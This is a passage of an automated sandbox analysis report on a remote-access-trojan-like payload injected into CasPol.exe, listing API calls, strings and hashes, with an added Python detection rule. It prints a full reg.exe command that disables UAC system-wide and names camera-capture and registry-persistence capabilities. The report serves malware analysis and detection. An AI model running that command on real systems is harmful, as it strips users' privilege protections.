• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseHandle$CreateProcess
• String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
• API String ID: 2922976086-4183131282
• Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
• Instruction ID: df89934bb1b0a8a8050eda01f74e4a29103dee5852f25f58c468be6e25eb4aa4
• Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
• Instruction Fuzzy Hash: 22F090B69402ADBACB30ABD69C0EFCF7F3CEBC5B10F00042AB605A6051D6705144CAB8
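The CreateProcessA call above launches `cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f`, which switches UAC off for the whole machine from the next reboot onward. The write needs administrative rights, so it only works because the injected CasPol.exe is already elevated (the CMSTPLUA bypass flagged in the signatures). The Python below is an added detection example, not from the report: it runs a command-line check over constructed process-creation events (the Sysmon Event ID 1 field names are an assumption about the log source) and flags only writes that set EnableLUA to zero, so a benign `reg.exe QUERY` or a `/d 1` re-enable does not fire.

```python
import re
from typing import Dict, List

# Constructed process-creation events. The field names follow Sysmon Event ID 1
# (an assumption about the log source); only the first CommandLine is taken from
# the report, the other three are made-up benign or variant commands.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe",
        "CommandLine": (
            r"C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD "
            r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System "
            r"/v EnableLUA /t REG_DWORD /d 0 /f"
        ),
    },
    {   # same write, long hive name, quoted key, hex zero: still a hit
        "Image": r"C:\Windows\System32\reg.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": (
            r'reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion'
            r'\Policies\System" /v EnableLUA /t REG_DWORD /d 0x0 /f'
        ),
    },
    {   # re-enabling UAC: not a hit
        "Image": r"C:\Windows\System32\reg.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": (
            r"reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System "
            r"/v EnableLUA /t REG_DWORD /d 1 /f"
        ),
    },
    {   # read-only query: not a hit
        "Image": r"C:\Windows\System32\reg.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": (
            r"reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System "
            r"/v EnableLUA"
        ),
    },
]

# reg.exe ADD against the UAC policy key, value EnableLUA, data zero in any of the
# spellings reg.exe accepts (0, 00, 0x0 ...). The order of /v and /d is not assumed.
_DISABLE_LUA_RE = re.compile(
    r"""(?<![\w-])reg(?:\.exe)?\s+add\s+"?
        (?:HKLM|HKEY_LOCAL_MACHINE)\\software\\microsoft\\windows\\currentversion\\policies\\system"?
        (?=.*\s/v\s+EnableLUA\b)        # value name anywhere after the key
        (?=.*\s/d\s+(?:0x)?0+\b)        # data is zero
    """,
    re.IGNORECASE | re.VERBOSE,
)


def is_enablelua_disable(cmdline: str) -> bool:
    """True when the command line writes EnableLUA=0 to the HKLM policy key."""
    return _DISABLE_LUA_RE.search(cmdline) is not None


def find_uac_disable_events(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the offending events with the fields an analyst pivots on."""
    hits = []
    for ev in events:
        cmd = ev.get("CommandLine", "")
        if not is_enablelua_disable(cmd):
            continue
        hits.append({
            "Image": ev.get("Image", ""),
            "ParentImage": ev.get("ParentImage", ""),
            "CommandLine": cmd,
            # cmd.exe /k keeps the shell alive after reg.exe returns, so a lingering
            # cmd.exe child of the parent is an extra artifact to look for on the host.
            "LingeringShell": bool(re.search(r"cmd(?:\.exe)?\s+/k\b", cmd, re.IGNORECASE)),
        })
    return hits


if __name__ == "__main__":
    for hit in find_uac_disable_events(SAMPLE_EVENTS):
        print(f"{hit['ParentImage']} -> {hit['Image']}: {hit['CommandLine']}")
```

Pair this process-creation rule with a registry-value-set event on the same value, since the write can also be made through RegSetValueEx without reg.exe ever appearing. A hit whose parent is a .NET utility such as CasPol.exe is itself evidence that an elevation bypass already succeeded, because an unelevated process cannot write to this key.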
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 00442609
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044261C
• FreeLibrary.KERNEL32(00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 0044263F
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
• Instruction ID: e7b95c4573467c94f6f12cd45ce5b447d53bb0dab0bc43500ba4ddd7032d9ec5
• Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
• Instruction Fuzzy Hash: 99F04430A04209FBDB119F95ED09B9EBFB5EB08756F4140B9F805A2251DF749D41CA9C
APIs
• RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
• RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
• RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: pth_unenc$BG
• API String ID: 1818849710-2233081382
• Opcode ID: 973a25ebb1caf1a999240221b82a1221728af968a6994185e1d569d383d5ef51
• Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
• Opcode Fuzzy Hash: 973a25ebb1caf1a999240221b82a1221728af968a6994185e1d569d383d5ef51
• Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
• SetEvent.KERNEL32(000002C0), ref: 00404AF9
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404B04
• CloseHandle.KERNEL32(00000000), ref: 00404B0D
  • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
• String ID: KeepAlive | Disabled
• API String ID: 2993684571-305739064
APIs
  • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
• GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F74
• PlaySoundW.WINMM(00000000,00000000), ref: 00419F82
• Sleep.KERNEL32(00002710), ref: 00419F89
• PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F92
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: PlaySound$HandleLocalModuleSleepTime
• String ID: Alarm triggered
• API String ID: 614609389-2816303416
APIs
• GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF12), ref: 0041BE89
• GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BE96
• SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF12), ref: 0041BEA3
• SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BEB6
Strings
• ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BEA9
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: Console$AttributeText$BufferHandleInfoScreen
• String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
• API String ID: 3024135584-2418719853
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
APIs
• Sleep.KERNEL32(00000000), ref: 00403E8A
  • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: H_prologSleep
• String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
• API String ID: 3469354165-3547787478
APIs
  • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
  • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
• Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
• CloseHandle.KERNEL32(00000000), ref: 0040E8AB
  • Part of subcall function 0041B197: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B1AC
  • Part of subcall function 0041B197: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1B7
  • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
  • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
• API String ID: 2180151492-0
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: _free
• API String ID: 269201875-0
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63), ref: 0044FF30
• __alloca_probe_16.LIBCMT ref: 0044FF68
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?), ref: 0044FFB9
• GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?,00000002,?), ref: 0044FFCB
• __freea.LIBCMT ref: 0044FFD4
  • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
• API String ID: 313313983-0
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0044E154
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E177
  • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E19D
• _free.LIBCMT ref: 0044E1B0
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1BF
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• API String ID: 336800556-0
                                                                                                                  • Opcode ID: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                                                                                  • Instruction ID: 6461b62384d036c2086eeacc55d57ac9fa1e09cc40192d7ba399f745acfb761f
                                                                                                                  • Opcode Fuzzy Hash: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                                                                                  • Instruction Fuzzy Hash: 7301D4726417117F33215AB76C8CC7B7A6DEAC6FA5319013AFC04D2241DA788C0291B9
                                                                                                                  APIs
                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                    • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                  • _free.LIBCMT ref: 100071B8
                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 336800556-0
                                                                                                                  • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                  • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                  • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                  • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(00000000,?,?,00445369,00446B52,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578), ref: 00446F58
                                                                                                                  • _free.LIBCMT ref: 00446F8D
                                                                                                                  • _free.LIBCMT ref: 00446FB4
                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00446FC1
                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00446FCA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3170660625-0
                                                                                                                  • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                  • Instruction ID: 63179894ab579f9662c65df04eda1c4e2cfad31ee62bae45dd706db9c2735e37
                                                                                                                  • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                                                  • Instruction Fuzzy Hash: 4F01D67620C7006BF61227757C85D2B1669EBC3776727013FF859A2292EE6CCC0A415F
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                  • _free.LIBCMT ref: 10005BB4
                                                                                                                  • _free.LIBCMT ref: 10005BDB
                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3170660625-0
                                                                                                                  • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                  • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                  • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                  • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                  APIs
                                                                                                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                                  • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3D8
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3E3
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3EB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseHandleOpen$FileImageName
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2951400881-0
                                                                                                                  • Opcode ID: ce5486b1f796499b88157f01d5bcfd41214e425df4fcbc0a0cf489e7c63b94f0
                                                                                                                  • Instruction ID: d8943217945b3e3bc9c1dbf33fc4ac7f726da2cd485b5cd5dbfa96192dfeb6c9
                                                                                                                  • Opcode Fuzzy Hash: ce5486b1f796499b88157f01d5bcfd41214e425df4fcbc0a0cf489e7c63b94f0
                                                                                                                  • Instruction Fuzzy Hash: 67F04971204209ABD3026794AC4AFEBB26CDF44B96F000037FA11D22A2FF74CCC146A9
                                                                                                                  APIs
                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                  • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                  • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                  • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                  • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen$lstrcat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 493641738-0
                                                                                                                  • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                  • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                  • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                  • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 0044F7C5
                                                                                                                    • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                    • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                  • _free.LIBCMT ref: 0044F7D7
                                                                                                                  • _free.LIBCMT ref: 0044F7E9
                                                                                                                  • _free.LIBCMT ref: 0044F7FB
                                                                                                                  • _free.LIBCMT ref: 0044F80D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                  • Instruction ID: 070623068f58a673a03bb4c9f7ddd8597c716d05cca38f31fa25b5a97b2bc473
                                                                                                                  • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                  • Instruction Fuzzy Hash: CBF01232505610ABA620EB59F9C1C1773EAEA427247A5882BF048F7A41C77DFCC0866C
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 100091D0
                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                  • _free.LIBCMT ref: 100091E2
                                                                                                                  • _free.LIBCMT ref: 100091F4
                                                                                                                  • _free.LIBCMT ref: 10009206
                                                                                                                  • _free.LIBCMT ref: 10009218
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                  • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                  • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
